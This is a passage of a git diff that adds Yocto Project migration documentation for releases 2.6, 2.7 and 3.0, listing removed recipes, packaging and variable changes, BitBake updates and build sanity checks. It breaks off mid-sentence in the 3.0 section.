+ bootloader into separate boot and rootfs partitions if necessary.
+
+- Patches whose context does not match exactly (i.e. where patch
+ reports "fuzz" when applying) will generate a warning. For an example
+ of this see `this
+ commit <http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=cc97bc08125b63821ce3f616771830f77c456f57>`__.
+
+- Layers are expected to set ``LAYERSERIES_COMPAT_layername`` to match
+ the version(s) of OpenEmbedded-Core they are compatible with. This is
+ specified as codenames using spaces to separate multiple values (e.g.
+ "rocko sumo"). If a layer does not set
+ ``LAYERSERIES_COMPAT_layername``, a warning will is shown. If a layer
+ sets a value that does not include the current version ("sumo" for
+ the 2.5 release), then an error will be produced.
+
+- The ``TZ`` environment variable is set to "UTC" within the build
+ environment in order to fix reproducibility problems in some recipes.
+
+
diff --git a/documentation/ref-manual/migration-2.6.rst b/documentation/ref-manual/migration-2.6.rst
new file mode 100644
index 0000000000..2f0da48ab6
--- /dev/null
+++ b/documentation/ref-manual/migration-2.6.rst
@@ -0,0 +1,457 @@
+Moving to the Yocto Project 2.6 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.6 Release from the prior release.
+
+.. _migration-2.6-gcc-changes:
+
+GCC 8.2 is Now Used by Default
+------------------------------
+
+The GNU Compiler Collection version 8.2 is now used by default for
+compilation. For more information on what has changed in the GCC 8.x
+release, see https://gcc.gnu.org/gcc-8/changes.html.
+
+If you still need to compile with version 7.x, GCC 7.3 is also provided.
+You can select this version by setting the and can be selected by
+setting the :term:`GCCVERSION` variable to "7.%" in
+your configuration.
+
+.. _migration-2.6-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- *beecrypt*: No longer needed since moving to RPM 4.
+- *bigreqsproto*: Replaced by ``xorgproto``.
+- *calibrateproto*: Removed in favor of ``xinput``.
+- *compositeproto*: Replaced by ``xorgproto``.
+- *damageproto*: Replaced by ``xorgproto``.
+- *dmxproto*: Replaced by ``xorgproto``.
+- *dri2proto*: Replaced by ``xorgproto``.
+- *dri3proto*: Replaced by ``xorgproto``.
+- *eee-acpi-scripts*: Became obsolete.
+- *fixesproto*: Replaced by ``xorgproto``.
+- *fontsproto*: Replaced by ``xorgproto``.
+- *fstests*: Became obsolete.
+- *gccmakedep*: No longer used.
+- *glproto*: Replaced by ``xorgproto``.
+- *gnome-desktop3*: No longer needed. This recipe has moved to ``meta-oe``.
+- *icon-naming-utils*: No longer used since the Sato theme was removed in 2016.
+- *inputproto*: Replaced by ``xorgproto``.
+- *kbproto*: Replaced by ``xorgproto``.
+- *libusb-compat*: Became obsolete.
+- *libuser*: Became obsolete.
+- *libnfsidmap*: No longer an external requirement since ``nfs-utils`` 2.2.1. ``libnfsidmap`` is now integrated.
+- *libxcalibrate*: No longer needed with ``xinput``
+- *mktemp*: Became obsolete. The ``mktemp`` command is provided by both ``busybox`` and ``coreutils``.
+- *ossp-uuid*: Is not being maintained and has mostly been replaced by ``uuid.h`` in ``util-linux``.
+- *pax-utils*: No longer needed. Previous QA tests that did use this recipe are now done at build time.
+- *pcmciautils*: Became obsolete.
+- *pixz*: No longer needed. ``xz`` now supports multi-threaded compression.
+- *presentproto*: Replaced by ``xorgproto``.
+- *randrproto*: Replaced by ``xorgproto``.
+- *recordproto*: Replaced by ``xorgproto``.
+- *renderproto*: Replaced by ``xorgproto``.
+- *resourceproto*: Replaced by ``xorgproto``.
+- *scrnsaverproto*: Replaced by ``xorgproto``.
+- *trace-cmd*: Became obsolete. ``perf`` replaced this recipe's functionally.
+- *videoproto*: Replaced by ``xorgproto``.
+- *wireless-tools*: Became obsolete. Superseded by ``iw``.
+- *xcmiscproto*: Replaced by ``xorgproto``.
+- *xextproto*: Replaced by ``xorgproto``.
+- *xf86dgaproto*: Replaced by ``xorgproto``.
+- *xf86driproto*: Replaced by ``xorgproto``.
+- *xf86miscproto*: Replaced by ``xorgproto``.
+- *xf86-video-omapfb*: Became obsolete. Use kernel modesetting driver instead.
+- *xf86-video-omap*: Became obsolete. Use kernel modesetting driver instead.
+- *xf86vidmodeproto*: Replaced by ``xorgproto``.
+- *xineramaproto*: Replaced by ``xorgproto``.
+- *xproto*: Replaced by ``xorgproto``.
+- *yasm*: No longer needed since previous usages are now satisfied by ``nasm``.
+
+.. _migration-2.6-packaging-changes:
+
+Packaging Changes
+-----------------
+
+The following packaging changes have been made:
+
+- *cmake*: ``cmake.m4`` and ``toolchain`` files have been moved to
+ the main package.
+
+- *iptables*: The ``iptables`` modules have been split into
+ separate packages.
+
+- *alsa-lib*: ``libasound`` is now in the main ``alsa-lib`` package
+ instead of ``libasound``.
+
+- *glibc*: ``libnss-db`` is now in its own package along with a
+ ``/var/db/makedbs.sh`` script to update databases.
+
+- *python and python3*: The main package has been removed from
+ the recipe. You must install specific packages or ``python-modules``
+ / ``python3-modules`` for everything.
+
+- *systemtap*: Moved ``systemtap-exporter`` into its own package.
+
+.. _migration-2.6-xorg-protocol-dependencies:
+
+XOrg Protocol dependencies
+--------------------------
+
+The ``*proto`` upstream repositories have been combined into one
+"xorgproto" repository. Thus, the corresponding recipes have also been
+combined into a single ``xorgproto`` recipe. Any recipes that depend
+upon the older ``*proto`` recipes need to be changed to depend on the
+newer ``xorgproto`` recipe instead.
+
+For names of recipes removed because of this repository change, see the
+`Removed Recipes <#removed-recipes>`__ section.
+
+.. _migration-2.6-distutils-distutils3-fetching-dependencies:
+
+``distutils`` and ``distutils3`` Now Prevent Fetching Dependencies During the ``do_configure`` Task
+---------------------------------------------------------------------------------------------------
+
+Previously, it was possible for Python recipes that inherited the
+:ref:`distutils <ref-classes-distutils>` and
+:ref:`distutils3 <ref-classes-distutils3>` classes to fetch code
+during the :ref:`ref-tasks-configure` task to satisfy
+dependencies mentioned in ``setup.py`` if those dependencies were not
+provided in the sysroot (i.e. recipes providing the dependencies were
+missing from :term:`DEPENDS`).
+
+.. note::
+
+ This change affects classes beyond just the two mentioned (i.e.
+ ``distutils`` and ``distutils3``). Any recipe that inherits ``distutils*``
+ classes are affected. For example, the ``setuptools`` and ``setuptools3``
+ recipes are affected since they inherit the ``distutils*`` classes.
+
+Fetching these types of dependencies that are not provided in the
+sysroot negatively affects the ability to reproduce builds. This type of
+fetching is now explicitly disabled. Consequently, any missing
+dependencies in Python recipes that use these classes now result in an
+error during the ``do_configure`` task.
+
+.. _migration-2.6-linux-yocto-configuration-audit-issues-now-correctly-reported:
+
+``linux-yocto`` Configuration Audit Issues Now Correctly Reported
+-----------------------------------------------------------------
+
+Due to a bug, the kernel configuration audit functionality was not
+writing out any resulting warnings during the build. This issue is now
+corrected. You might notice these warnings now if you have a custom
+kernel configuration with a ``linux-yocto`` style kernel recipe.
+
+.. _migration-2.6-image-kernel-artifact-naming-changes:
+
+Image/Kernel Artifact Naming Changes
+------------------------------------
+
+The following changes have been made:
+
+- Name variables (e.g. :term:`IMAGE_NAME`) use a new
+ ``IMAGE_VERSION_SUFFIX`` variable instead of
+ :term:`DATETIME`. Using ``IMAGE_VERSION_SUFFIX``
+ allows easier and more direct changes.
+
+ The ``IMAGE_VERSION_SUFFIX`` variable is set in the ``bitbake.conf``
+ configuration file as follows:
+ ::
+
+ IMAGE_VERSION_SUFFIX = "-${DATETIME}"
+
+- Several variables have changed names for consistency:
+ ::
+
+ Old Variable Name New Variable Name
+ ========================================================
+ KERNEL_IMAGE_BASE_NAME KERNEL_IMAGE_NAME
+ KERNEL_IMAGE_SYMLINK_NAME KERNEL_IMAGE_LINK_NAME
+ MODULE_TARBALL_BASE_NAME MODULE_TARBALL_NAME
+ MODULE_TARBALL_SYMLINK_NAME MODULE_TARBALL_LINK_NAME
+ INITRAMFS_BASE_NAME INITRAMFS_NAME
+
+- The ``MODULE_IMAGE_BASE_NAME`` variable has been removed. The module
+ tarball name is now controlled directly with the
+ :term:`MODULE_TARBALL_NAME` variable.
+
+- The :term:`KERNEL_DTB_NAME` and
+ :term:`KERNEL_DTB_LINK_NAME` variables
+ have been introduced to control kernel Device Tree Binary (DTB)
+ artifact names instead of mangling ``KERNEL_IMAGE_*`` variables.
+
+- The :term:`KERNEL_FIT_NAME` and
+ :term:`KERNEL_FIT_LINK_NAME` variables
+ have been introduced to specify the name of flattened image tree
+ (FIT) kernel images similar to other deployed artifacts.
+
+- The :term:`MODULE_TARBALL_NAME` and
+ :term:`MODULE_TARBALL_LINK_NAME`
+ variable values no longer include the "module-" prefix or ".tgz"
+ suffix. These parts are now hardcoded so that the values are
+ consistent with other artifact naming variables.
+
+- Added the :term:`INITRAMFS_LINK_NAME`
+ variable so that the symlink can be controlled similarly to other
+ artifact types.
+
+- :term:`INITRAMFS_NAME` now uses
+ "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}" instead
+ of "${PV}-${PR}-${MACHINE}-${DATETIME}", which makes it consistent
+ with other variables.
+
+.. _migration-2.6-serial-console-deprecated:
+
+``SERIAL_CONSOLE`` Deprecated
+-----------------------------
+
+The :term:`SERIAL_CONSOLE` variable has been
+functionally replaced by the
+:term:`SERIAL_CONSOLES` variable for some time.
+With the Yocto Project 2.6 release, ``SERIAL_CONSOLE`` has been
+officially deprecated.
+
+``SERIAL_CONSOLE`` will continue to work as before for the 2.6 release.
+However, for the sake of future compatibility, it is recommended that
+you replace all instances of ``SERIAL_CONSOLE`` with
+``SERIAL_CONSOLES``.
+
+.. note::
+
+ The only difference in usage is that ``SERIAL_CONSOLES``
+ expects entries to be separated using semicolons as compared to
+ ``SERIAL_CONSOLE``, which expects spaces.
+
+.. _migration-2.6-poky-sets-unknown-configure-option-to-qa-error:
+
+Configure Script Reports Unknown Options as Errors
+--------------------------------------------------
+
+If the configure script reports an unknown option, this now triggers a
+QA error instead of a warning. Any recipes that previously got away with
+specifying such unknown options now need to be fixed.
+
+.. _migration-2.6-override-changes:
+
+Override Changes
+----------------
+
+The following changes have occurred:
+
+- The ``virtclass-native`` and ``virtclass-nativesdk`` Overrides Have
+ Been Removed: The ``virtclass-native`` and ``virtclass-nativesdk``
+ overrides have been deprecated since 2012 in favor of
+ ``class-native`` and ``class-nativesdk``, respectively. Both
+ ``virtclass-native`` and ``virtclass-nativesdk`` are now dropped.
+
+ .. note::
+
+ The ``virtclass-multilib-`` overrides for multilib are still valid.
+
+- The ``forcevariable`` Override Now Has a Higher Priority Than
+ ``libc`` Overrides: The ``forcevariable`` override is documented to
+ be the highest priority override. However, due to a long-standing
+ quirk of how :term:`OVERRIDES` is set, the ``libc``
+ overrides (e.g. ``libc-glibc``, ``libc-musl``, and so forth)
+ erroneously had a higher priority. This issue is now corrected.
+
+ It is likely this change will not cause any problems. However, it is
+ possible with some unusual configurations that you might see a change
+ in behavior if you were relying on the previous behavior. Be sure to
+ check how you use ``forcevariable`` and ``libc-*`` overrides in your
+ custom layers and configuration files to ensure they make sense.
+
+- The ``build-${BUILD_OS}`` Override Has Been Removed: The
+ ``build-${BUILD_OS}``, which is typically ``build-linux``, override
+ has been removed because building on a host operating system other
+ than a recent version of Linux is neither supported nor recommended.
+ Dropping the override avoids giving the impression that other host
+ operating systems might be supported.
+
+- The "_remove" operator now preserves whitespace. Consequently, when
+ specifying list items to remove, be aware that leading and trailing
+ whitespace resulting from the removal is retained.
+
+ See the ":ref:`bitbake:removing-override-style-syntax`"
+ section in the BitBake User Manual for a detailed example.
+
+.. _migration-2.6-systemd-configuration-now-split-out-to-system-conf:
+
+``systemd`` Configuration is Now Split Into ``systemd-conf``
+------------------------------------------------------------
+
+The configuration for the ``systemd`` recipe has been moved into a
+``system-conf`` recipe. Moving this configuration to a separate recipe
+avoids the ``systemd`` recipe from becoming machine-specific for cases
+where machine-specific configurations need to be applied (e.g. for
+``qemu*`` machines).
+
+Currently, the new recipe packages the following files:
+::
+
+ ${sysconfdir}/machine-id
+ ${sysconfdir}/systemd/coredump.conf
+ ${sysconfdir}/systemd/journald.conf
+ ${sysconfdir}/systemd/logind.conf
+ ${sysconfdir}/systemd/system.conf
+ ${sysconfdir}/systemd/user.conf
+
+If you previously used bbappend files to append the ``systemd`` recipe to
+change any of the listed files, you must do so for the ``systemd-conf``
+recipe instead.
+
+.. _migration-2.6-automatic-testing-changes:
+
+Automatic Testing Changes
+-------------------------
+
+This section provides information about automatic testing changes:
+
+- ``TEST_IMAGE`` Variable Removed: Prior to this release, you set the
+ ``TEST_IMAGE`` variable to "1" to enable automatic testing for
+ successfully built images. The ``TEST_IMAGE`` variable no longer
+ exists and has been replaced by the
+ :term:`TESTIMAGE_AUTO` variable.
+
+- Inheriting the ``testimage`` and ``testsdk`` Classes: Best
+ practices now dictate that you use the
+ :term:`IMAGE_CLASSES` variable rather than the
+ :term:`INHERIT` variable when you inherit the
+ :ref:`testimage <ref-classes-testimage*>` and
+ :ref:`testsdk <ref-classes-testsdk>` classes used for automatic
+ testing.
+
+.. _migration-2.6-openssl-changes:
+
+OpenSSL Changes
+---------------
+
+`OpenSSL <https://www.openssl.org/>`__ has been upgraded from 1.0 to
+1.1. By default, this upgrade could cause problems for recipes that have
+both versions in their dependency chains. The problem is that both
+versions cannot be installed together at build time.
+
+.. note::
+
+ It is possible to have both versions of the library at runtime.
+
+.. _migration-2.6-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The server logfile ``bitbake-cookerdaemon.log`` is now always placed in
+the :term:`Build Directory` instead of the current
+directory.
+
+.. _migration-2.6-security-changes:
+
+Security Changes
+----------------
+
+The Poky distribution now uses security compiler flags by default.
+Inclusion of these flags could cause new failures due to stricter
+checking for various potential security issues in code.
+
+.. _migration-2.6-post-installation-changes:
+
+Post Installation Changes
+-------------------------
+
+You must explicitly mark post installs to defer to the target. If you
+want to explicitly defer a postinstall to first boot on the target
+rather than at rootfs creation time, use ``pkg_postinst_ontarget()`` or
+call ``postinst_intercept delay_to_first_boot`` from ``pkg_postinst()``.
+Any failure of a ``pkg_postinst()`` script (including exit 1) triggers
+an error during the :ref:`ref-tasks-rootfs` task.
+
+For more information on post-installation behavior, see the
+":ref:`dev-manual/dev-manual-common-tasks:post-installation scripts`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-2.6-python-3-profile-guided-optimizations:
+
+Python 3 Profile-Guided Optimization
+------------------------------------
+
+The ``python3`` recipe now enables profile-guided optimization. Using
+this optimization requires a little extra build time in exchange for
+improved performance on the target at runtime. Additionally, the
+optimization is only enabled if the current
+:term:`MACHINE` has support for user-mode emulation in
+QEMU (i.e. "qemu-usermode" is in
+:term:`MACHINE_FEATURES`, which it is by
+default).
+
+If you wish to disable Python profile-guided optimization regardless of
+the value of ``MACHINE_FEATURES``, then ensure that
+:term:`PACKAGECONFIG` for the ``python3`` recipe
+does not contain "pgo". You could accomplish the latter using the
+following at the configuration level:
+::
+
+ PACKAGECONFIG_remove_pn-python3 = "pgo"
+
+Alternatively, you can set ``PACKAGECONFIG`` using an append file
+for the ``python3`` recipe.
+
+.. _migration-2.6-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes occurred:
+
+- Default to using the Thumb-2 instruction set for armv7a and above. If
+ you have any custom recipes that build software that needs to be
+ built with the ARM instruction set, change the recipe to set the
+ instruction set as follows:
+ ::
+
+ ARM_INSTRUCTION_SET = "arm"
+
+- ``run-postinsts`` no longer uses ``/etc/*-postinsts`` for
+ ``dpkg/opkg`` in favor of built-in postinst support. RPM behavior
+ remains unchanged.
+
+- The ``NOISO`` and ``NOHDD`` variables are no longer used. You now
+ control building ``*.iso`` and ``*.hddimg`` image types directly by
+ using the :term:`IMAGE_FSTYPES` variable.
+
+- The ``scripts/contrib/mkefidisk.sh`` has been removed in favor of
+ Wic.
+
+- ``kernel-modules`` has been removed from
+ :term:`RRECOMMENDS` for ``qemumips`` and
+ ``qemumips64`` machines. Removal also impacts the ``x86-base.inc``
+ file.
+
+ .. note::
+
+ ``genericx86`` and ``genericx86-64`` retain ``kernel-modules`` as part of
+ the ``RRECOMMENDS`` variable setting.
+
+- The ``LGPLv2_WHITELIST_GPL-3.0`` variable has been removed. If you
+ are setting this variable in your configuration, set or append it to
+ the ``WHITELIST_GPL-3.0`` variable instead.
+
+- ``${ASNEEDED}`` is now included in the
+ :term:`TARGET_LDFLAGS` variable directly. The
+ remaining definitions from ``meta/conf/distro/include/as-needed.inc``
+ have been moved to corresponding recipes.
+
+- Support for DSA host keys has been dropped from the OpenSSH recipes.
+ If you are still using DSA keys, you must switch over to a more
+ secure algorithm as recommended by OpenSSH upstream.
+
+- The ``dhcp`` recipe now uses the ``dhcpd6.conf`` configuration file
+ in ``dhcpd6.service`` for IPv6 DHCP rather than re-using
+ ``dhcpd.conf``, which is now reserved for IPv4.
+
+
diff --git a/documentation/ref-manual/migration-2.7.rst b/documentation/ref-manual/migration-2.7.rst
new file mode 100644
index 0000000000..7e628fc3ec
--- /dev/null
+++ b/documentation/ref-manual/migration-2.7.rst
@@ -0,0 +1,180 @@
+Moving to the Yocto Project 2.7 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.7 Release from the prior release.
+
+.. _migration-2.7-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The following changes have been made to BitBake:
+
+- BitBake now checks anonymous Python functions and pure Python
+ functions (e.g. ``def funcname:``) in the metadata for tab
+ indentation. If found, BitBake produces a warning.
+
+- Bitbake now checks
+ :term:`BBFILE_COLLECTIONS` for duplicate
+ entries and triggers an error if any are found.
+
+.. _migration-2.7-eclipse-support-dropped:
+
+Eclipse Support Removed
+-----------------------
+
+Support for the Eclipse IDE has been removed. Support continues for
+those releases prior to 2.7 that did include support. The 2.7 release
+does not include the Eclipse Yocto plugin.
+
+.. _migration-2.7-qemu-native-splits-system-and-user-mode-parts:
+
+``qemu-native`` Splits the System and User-Mode Parts
+-----------------------------------------------------
+
+The system and user-mode parts of ``qemu-native`` are now split.
+``qemu-native`` provides the user-mode components and
+``qemu-system-native`` provides the system components. If you have
+recipes that depend on QEMU's system emulation functionality at build
+time, they should now depend upon ``qemu-system-native`` instead of
+``qemu-native``.
+
+.. _migration-2.7-upstream-tracking.inc-removed:
+
+The ``upstream-tracking.inc`` File Has Been Removed
+---------------------------------------------------
+
+The previously deprecated ``upstream-tracking.inc`` file is now removed.
+Any ``UPSTREAM_TRACKING*`` variables are now set in the corresponding
+recipes instead.
+
+Remove any references you have to the ``upstream-tracking.inc`` file in
+your configuration.
+
+.. _migration-2.7-distro-features-libc-removed:
+
+The ``DISTRO_FEATURES_LIBC`` Variable Has Been Removed
+------------------------------------------------------
+
+The ``DISTRO_FEATURES_LIBC`` variable is no longer used. The ability to
+configure glibc using kconfig has been removed for quite some time
+making the ``libc-*`` features set no longer effective.
+
+Remove any references you have to ``DISTRO_FEATURES_LIBC`` in your own
+layers.
+
+.. _migration-2.7-license-values:
+
+License Value Corrections
+-------------------------
+
+The following corrections have been made to the
+:term:`LICENSE` values set by recipes:
+
+- *socat*: Corrected ``LICENSE`` to be "GPLv2" rather than "GPLv2+".
+- *libgfortran*: Set license to "GPL-3.0-with-GCC-exception".
+- *elfutils*: Removed "Elfutils-Exception" and set to "GPLv2" for shared libraries
+
+.. _migration-2.7-packaging-changes:
+
+Packaging Changes
+-----------------
+
+This section provides information about packaging changes.
+
+- ``bind``: The ``nsupdate`` binary has been moved to the
+ ``bind-utils`` package.
+
+- Debug split: The default debug split has been changed to create
+ separate source packages (i.e. package_name\ ``-dbg`` and
+ package_name\ ``-src``). If you are currently using ``dbg-pkgs`` in
+ :term:`IMAGE_FEATURES` to bring in debug
+ symbols and you still need the sources, you must now also add
+ ``src-pkgs`` to ``IMAGE_FEATURES``. Source packages remain in the
+ target portion of the SDK by default, unless you have set your own
+ value for :term:`SDKIMAGE_FEATURES` that
+ does not include ``src-pkgs``.
+
+- Mount all using ``util-linux``: ``/etc/default/mountall`` has moved
+ into the -mount sub-package.
+
+- Splitting binaries using ``util-linux``: ``util-linux`` now splits
+ each binary into its own package for fine-grained control. The main
+ ``util-linux`` package pulls in the individual binary packages using
+ the :term:`RRECOMMENDS` and
+ :term:`RDEPENDS` variables. As a result, existing
+ images should not see any changes assuming
+ :term:`NO_RECOMMENDATIONS` is not set.
+
+- ``netbase/base-files``: ``/etc/hosts`` has moved from ``netbase`` to
+ ``base-files``.
+
+- ``tzdata``: The main package has been converted to an empty meta
+ package that pulls in all ``tzdata`` packages by default.
+
+- ``lrzsz``: This package has been removed from
+ ``packagegroup-self-hosted`` and
+ ``packagegroup-core-tools-testapps``. The X/Y/ZModem support is less
+ likely to be needed on modern systems. If you are relying on these
+ packagegroups to include the ``lrzsz`` package in your image, you now
+ need to explicitly add the package.
+
+.. _migration-2.7-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- *gcc*: Drop version 7.3 recipes. Version 8.3 now remains.
+- *linux-yocto*: Drop versions 4.14 and 4.18 recipes. Versions 4.19 and 5.0 remain.
+- *go*: Drop version 1.9 recipes. Versions 1.11 and 1.12 remain.
+- *xvideo-tests*: Became obsolete.
+- *libart-lgpl*: Became obsolete.
+- *gtk-icon-utils-native*: These tools are now provided by gtk+3-native
+- *gcc-cross-initial*: No longer needed. gcc-cross/gcc-crosssdk is now used instead.
+- *gcc-crosssdk-initial*: No longer needed. gcc-cross/gcc-crosssdk is now used instead.
+- *glibc-initial*: Removed because the benefits of having it for site_config are currently outweighed by the cost of building the recipe.
+
+.. _migration-2.7-removed-classes:
+
+Removed Classes
+---------------
+
+The following classes have been removed:
+
+- *distutils-tools*: This class was never used.
+- *bugzilla.bbclass*: Became obsolete.
+- *distrodata*: This functionally has been replaced by a more modern tinfoil-based implementation.
+
+.. _migration-2.7-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes occurred:
+
+- The ``distro`` subdirectory of the Poky repository has been removed
+ from the top-level ``scripts`` directory.
+
+- Perl now builds for the target using
+ `perl-cross <http://arsv.github.io/perl-cross/>`_ for better
+ maintainability and improved build performance. This change should
+ not present any problems unless you have heavily customized your Perl
+ recipe.
+
+- ``arm-tunes``: Removed the "-march" option if mcpu is already added.
+
+- ``update-alternatives``: Convert file renames to
+ :term:`PACKAGE_PREPROCESS_FUNCS`
+
+- ``base/pixbufcache``: Obsolete ``sstatecompletions`` code has been
+ removed.
+
+- :ref:`native <ref-classes-native>` class:
+ :term:`RDEPENDS` handling has been enabled.
+
+- ``inetutils``: This recipe has rsh disabled.
+
+
diff --git a/documentation/ref-manual/migration-3.0.rst b/documentation/ref-manual/migration-3.0.rst
new file mode 100644
index 0000000000..50f7d697b0
--- /dev/null
+++ b/documentation/ref-manual/migration-3.0.rst
@@ -0,0 +1,319 @@
+Moving to the Yocto Project 3.0 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 3.0 Release from the prior release.
+
+.. _migration-3.0-init-system-selection:
+
+Init System Selection
+---------------------
+
+Changing the init system manager previously required setting a number of
+different variables. You can now change the manager by setting the
+``INIT_MANAGER`` variable and the corresponding include files (i.e.
+``conf/distro/include/init-manager-*.conf``). Include files are provided
+for four values: "none", "sysvinit", "systemd", and "mdev-busybox". The
+default value, "none", for ``INIT_MANAGER`` should allow your current
+settings to continue working. However, it is advisable to explicitly set
+``INIT_MANAGER``.
+
+.. _migration-3.0-lsb-support-removed:
+
+LSB Support Removed
+-------------------
+
+Linux Standard Base (LSB) as a standard is not current, and is not well
+suited for embedded applications. Support can be continued in a separate
+layer if needed. However, presently LSB support has been removed from
+the core.
+
+As a result of this change, the ``poky-lsb`` derivative distribution
+configuration that was also used for testing alternative configurations
+has been replaced with a ``poky-altcfg`` distribution that has LSB parts
+removed.
+
+.. _migration-3.0-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed.
+
+- ``core-image-lsb-dev``: Part of removed LSB support.
+
+- ``core-image-lsb``: Part of removed LSB support.
+
+- ``core-image-lsb-sdk``: Part of removed LSB support.
+
+- ``cve-check-tool``: Functionally replaced by the ``cve-update-db``
+ recipe and ``cve-check`` class.
+
+- ``eglinfo``: No longer maintained. ``eglinfo`` from ``mesa-demos`` is
+ an adequate and maintained alternative.
+
+- ``gcc-8.3``: Version 8.3 removed. Replaced by 9.2.
+
+- ``gnome-themes-standard``: Only needed by gtk+ 2.x, which has been
+ removed.
+
+- ``gtk+``: GTK+ 2 is obsolete and has been replaced by gtk+3.
+
+- ``irda-utils``: Has become obsolete. IrDA support has been removed
+ from the Linux kernel in version 4.17 and later.
+
+- ``libnewt-python``: ``libnewt`` Python support merged into main
+ ``libnewt`` recipe.
+
+- ``libsdl``: Replaced by newer ``libsdl2``.
+
+- ``libx11-diet``: Became obsolete.
+
+- ``libxx86dga``: Removed obsolete client library.
+
+- ``libxx86misc``: Removed. Library is redundant.
+
+- ``linux-yocto``: Version 5.0 removed, which is now redundant (5.2 /
+ 4.19 present).
+
+- ``lsbinitscripts``: Part of removed LSB support.
+
+- ``lsb``: Part of removed LSB support.
+
+- ``lsbtest``: Part of removed LSB support.
+
+- ``openssl10``: Replaced by newer ``openssl`` version 1.1.
+
+- ``packagegroup-core-lsb``: Part of removed LSB support.
+
+- ``python-nose``: Removed the Python 2.x version of the recipe.
+
+- ``python-numpy``: Removed the Python 2.x version of the recipe.
+
+- ``python-scons``: Removed the Python 2.x version of the recipe.
+
+- ``source-highlight``: No longer needed.
+
+- ``stress``: Replaced by ``stress-ng``.
+
+- ``vulkan``: Split into ``vulkan-loader``, ``vulkan-headers``, and
+ ``vulkan-tools``.
+
+- ``weston-conf``: Functionality moved to ``weston-init``.
+
+.. _migration-3.0-packaging-changes:
+
+Packaging Changes
+-----------------
+
+The following packaging changes have occurred.
+
+- The `Epiphany <https://en.wikipedia.org/wiki/GNOME_Web>`__ browser
+ has been dropped from ``packagegroup-self-hosted`` as it has not been
+ needed inside ``build-appliance-image`` for quite some time and was
+ causing resource problems.
+
+- ``libcap-ng`` Python support has been moved to a separate
+ ``libcap-ng-python`` recipe to streamline the build process when the
+ Python bindings are not needed.
+
+- ``libdrm`` now packages the file ``amdgpu.ids`` into a separate
+ ``libdrm-amdgpu`` package.
+
+- ``python3``: The ``runpy`` module is now in the ``python3-core``
+ package as it is required to support the common "python3 -m" command
+ usage.
+
+- ``distcc`` now provides separate ``distcc-client`` and
+ ``distcc-server`` packages as typically one or the other are needed,
+ rather than both.
+
+- ``python*-setuptools`` recipes now separately package the
+ ``pkg_resources`` module in a ``python-pkg-resources`` /
+ ``python3-pkg-resources`` package as the module is useful independent
+ of the rest of the setuptools package. The main ``python-setuptools``
+ / ``python3-setuptools`` package depends on this new package so you
+ should only need to update dependencies unless you want to take
+ advantage of the increased granularity.
+
+.. _migration-3.0-cve-checking:
+
+CVE Checking
+------------
+
+``cve-check-tool`` has been functionally replaced by a new
+``cve-update-db`` recipe and functionality built into the ``cve-check``
+class. The result uses NVD JSON data feeds rather than the deprecated
+XML feeds that ``cve-check-tool`` was using, supports CVSSv3 scoring,
+and makes other improvements.
+
+Additionally, the ``CVE_CHECK_CVE_WHITELIST`` variable has been replaced
+by ``CVE_CHECK_WHITELIST``.
+
+.. _migration-3.0-bitbake-changes:
+
+Bitbake Changes
+---------------
+
+The following BitBake changes have occurred.
+
+- ``addtask`` statements now properly validate dependent tasks.
+ Previously, an invalid task was silently ignored. With this change,
+ the invalid task generates a warning.
+
+- Other invalid ``addtask`` and ``deltask`` usages now trigger these
+ warnings: "multiple target tasks arguments with addtask / deltask",
+ and "multiple before/after clauses".
+
+- The "multiconfig" prefix is now shortened to "mc". "multiconfig" will
+ continue to work, however it may be removed in a future release.
+
+- The ``bitbake -g`` command no longer generates a
+ ``recipe-depends.dot`` file as the contents (i.e. a reprocessed
+ version of ``task-depends.dot``) were confusing.
+
+- The ``bb.build.FuncFailed`` exception, previously raised by
+ ``bb.build.exec_func()`` when certain other exceptions have occurred,
+ has been removed. The real underlying exceptions will be raised
+ instead. If you have calls to ``bb.build.exec_func()`` in custom
+ classes or ``tinfoil-using`` scripts, any references to
+ ``bb.build.FuncFailed`` should be cleaned up.
+
+- Additionally, the ``bb.build.exec_func()`` no longer accepts the
+ "pythonexception" parameter. The function now always raises
+ exceptions. Remove this argument in any calls to
+ ``bb.build.exec_func()`` in custom classes or scripts.
+
+- The ``BB_SETSCENE_VERIFY_FUNCTION2`` variable
+ is no longer used. In the unlikely event that you have any references
+ to it, they should be removed.
+
+- The ``RunQueueExecuteScenequeue`` and ``RunQueueExecuteTasks`` events
+ have been removed since setscene tasks are now executed as part of
+ the normal runqueue. Any event handling code in custom classes or
+ scripts that handles these two events need to be updated.
+
+- The arguments passed to functions used with
+ :term:`bitbake:BB_HASHCHECK_FUNCTION`
+ have changed. If you are using your own custom hash check function,
+ see :yocto_git:`/cgit/cgit.cgi/poky/commit/?id=40a5e193c4ba45c928fccd899415ea56b5417725`
+ for details.
+
+- Task specifications in ``BB_TASKDEPDATA`` and class implementations
+ used in signature generator classes now use "<fn>:<task>" everywhere
+ rather than the "." delimiter that was being used in some places.
+ This change makes it consistent with all areas in the code. Custom
+ signature generator classes and code that reads ``BB_TASKDEPDATA``
+ need to be updated to use ':' as a separator rather than '.'.
+
+.. _migration-3.0-sanity-checks:
+
+Sanity Checks
+-------------
+
+The following sanity check changes occurred.
+
+- :term:`SRC_URI` is now checked for usage of two
+ problematic items:
+
+ - "${PN}" prefix/suffix use - Warnings always appear if ${PN} is
+ used. You must fix the issue regardless of whether multiconfig or
+ anything else that would cause prefixing/suffixing to happen.
+
+ - Github archive tarballs - these are not guaranteed to be stable.
+ Consequently, it is likely that the tarballs will be refreshed and
+ thus the SRC_URI checksums will fail to apply. It is recommended
+ that you fetch either an official release tarball or a specific
+ revision from the actual Git repository instead.
+
+ Either one of these items now trigger a warning by default. If you
